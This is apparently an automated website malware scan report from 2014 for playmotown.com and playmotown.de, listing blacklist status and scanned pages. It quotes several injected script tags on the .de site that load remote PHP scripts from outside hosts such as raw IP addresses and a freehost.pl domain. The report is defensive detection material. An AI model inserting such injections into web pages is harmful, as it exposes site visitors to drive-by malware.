Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=playmotown.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://playmotown.com/ | HTTP/1.1 200 OK Connection: close Date: Fri, 09 May 2014 18:43:51 GMT Server: nginx/1.4.7 Vary: Accept-Encoding Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://www.playmotown.de/ | 200 OK Content-Length: 15475 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://97.74.10.68/cache/Bai5MZH4.php?id=59852884" type="text/javascript"></script> | ||
http://www.playmotown.de/js/prototype.js | 200 OK Content-Length: 126281 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://fotokojtek.freehost.pl/69rmwchq.php?id=59852970"></script>');
| ||
http://playmotown.com/js/scriptaculous.js?load=effects,builder | HTTP/1.1 200 OK Connection: close Date: Fri, 09 May 2014 18:43:53 GMT Server: nginx/1.4.7 Vary: Accept-Encoding Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://www.playmotown.de/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 2802 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://fotokojtek.freehost.pl/69rmwchq.php?id=59852971"></script>');
| ||
http://playmotown.com/js/lightbox.js | HTTP/1.1 200 OK Connection: close Date: Fri, 09 May 2014 18:43:54 GMT Server: nginx/1.4.7 Vary: Accept-Encoding Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://www.playmotown.de/js/lightbox.js | 200 OK Content-Length: 18537 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://fotokojtek.freehost.pl/69rmwchq.php?id=59852969"></script>');
| ||
http://playmotown.com/index.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 09 May 2014 18:43:54 GMT Server: nginx/1.4.7 Vary: Accept-Encoding Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://www.playmotown.de/index.htm | 200 OK Content-Length: 15475 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://97.74.10.68/cache/Bai5MZH4.php?id=59852884" type="text/javascript"></script> | ||
http://www.playmotown.de/main/news/news.html | 200 OK Content-Length: 54664 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://79.96.118.25/vault_scripts/GnQRz4Yt.php?id="></script> | ||
http://www.playmotown.de/main/news/js/prototype.js | 404 Not Found Content-Length: 801 Content-Type: text/html | clean |
http://www.playmotown.de/test404page.js | 404 Not Found Content-Length: 801 Content-Type: text/html | clean |
http://www.playmotown.de/main/news/js/scriptaculous.js?load=effects,builder | 404 Not Found Content-Length: 801 Content-Type: text/html | clean |
http://www.playmotown.de/main/news/js/lightbox.js | 404 Not Found Content-Length: 801 Content-Type: text/html | clean |
http://playmotown.com/main/newsl.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 09 May 2014 18:43:55 GMT Server: nginx/1.4.7 Vary: Accept-Encoding Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://www.playmotown.de/main/newsl.htm | 200 OK Content-Length: 22467 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://79.96.118.25/vault_scripts/GnQRz4Yt.php?id="></script> | ||
http://www.playmotown.de/main/js/prototype.js | 404 Not Found Content-Length: 801 Content-Type: text/html | clean |
http://playmotown.com/main/js/scriptaculous.js?load=effects,builder | HTTP/1.1 200 OK Connection: close Date: Fri, 09 May 2014 18:43:55 GMT Server: nginx/1.4.7 Vary: Accept-Encoding Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://www.playmotown.de/main/js/scriptaculous.js?load=effects,builder | 404 Not Found Content-Length: 801 Content-Type: text/html | clean |
http://playmotown.com/main/js/lightbox.js | HTTP/1.1 200 OK Connection: close Date: Fri, 09 May 2014 18:43:56 GMT Server: nginx/1.4.7 Vary: Accept-Encoding Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://www.playmotown.de/main/js/lightbox.js | 404 Not Found Content-Length: 801 Content-Type: text/html | clean |
http://playmotown.com/main/info.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 09 May 2014 18:43:56 GMT Server: nginx/1.4.7 Vary: Accept-Encoding Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://www.playmotown.de/main/info.htm | 200 OK Content-Length: 19340 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://79.96.118.25/vault_scripts/GnQRz4Yt.php?id="></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: playmotown.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 May 2014 18:43:51 GMT
Server: nginx/1.4.7
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: playmotown.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 May 2014 18:43:51 GMT
Server: nginx/1.4.7
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: playmotown.com
Referer: http://www.google.com/search?q=playmotown.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: playmotown.com
Referer: http://www.google.com/search?q=playmotown.com
Result:
The result is similar to the first query. There are no suspicious redirects found.